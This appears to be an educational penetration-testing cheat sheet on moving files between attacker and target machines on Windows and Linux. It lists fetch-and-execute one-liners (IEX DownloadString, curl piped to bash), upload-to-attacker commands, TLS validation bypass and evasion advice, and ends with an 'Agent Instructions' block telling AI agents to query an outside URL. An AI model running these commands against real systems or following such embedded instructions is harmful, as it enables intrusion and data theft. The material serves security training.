# File Transfer Techniques for Pentesting

## Overview

File transfer techniques are critical for penetration testing, especially in restricted environments. This guide covers both Windows and Linux methods, with practical commands and methodologies.

## Common Challenges

* **Host-based Controls**
  * Application whitelisting
  * AV/EDR blocking
  * Process monitoring
* **Network Controls**
  * Firewall restrictions
  * IDS/IPS monitoring
  * Port filtering

## Windows Transfer Techniques

### PowerShell Methods

#### Base64 Transfer (No Network Required)

```powershell
# On Attacker (Linux)
cat file | base64 -w 0

# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))

# Verify Transfer
Get-FileHash C:\path\to\file -Algorithm MD5
```

#### Web Downloads

```powershell
# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')

# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')

# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile>
```

### SMB Transfer

```powershell
# On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support

# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe

# Authenticated SMB
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test
net use Z: \\<Attacker_IP>\share /user:test test
```

### FTP Transfer

```powershell
# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write

# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')

# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')
```

### Living Off The Land (LOtL) Binaries

* WMIC
* Bitsadmin
* Certutil
* Regsvr32

## Linux Transfer Techniques

### Base64 Transfer

```bash
# Encode
cat file | base64 -w 0; echo

# Decode
echo -n '<base64_string>' | base64 -d > file

# Verify
md5sum file
```

### Web Transfer Methods

#### Download

```bash
# Wget
wget <URL> -O /path/to/file

# cURL
curl -o /path/to/file <URL>

# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3
```

#### Upload

```bash
# cURL POST
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure

# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
```

### SSH/SCP Transfer

```bash
# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh

# Download
scp username@<IP>:/remote/file /local/directory

# Upload
scp /local/file username@<IP>:/remote/directory
```

### Simple Web Server

```bash
# Python3
python3 -m http.server

# PHP
php -S 0.0.0.0:8000
```

## Common Issues & Solutions

### SSL/TLS Issues (Windows)

```powershell
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

### Port Considerations

* HTTP/HTTPS (80/443) - Usually allowed
* SMB (445) - Often blocked
* FTP (20/21) - May be filtered
* SSH/SCP (22) - May require configuration

## Security Best Practices

1. **Transfer Verification**
   * Always verify file integrity (MD5/SHA)
   * Check file permissions after transfer
2. **Operational Security**
   * Clean up temporary files
   * Remove credentials after use
   * Monitor for security alerts
   * Use encryption when possible
3. **Fileless Operations**
   * Prefer memory-only operations
   * Clean up artifacts
   * Be aware of logging/monitoring
4. **Network Security**
   * Use HTTPS/FTPS when available
   * Consider file size limitations
   * Monitor for AV/EDR alerts


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://edu.noirchapeau.com/file-transfer-techniques-for-pentesting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.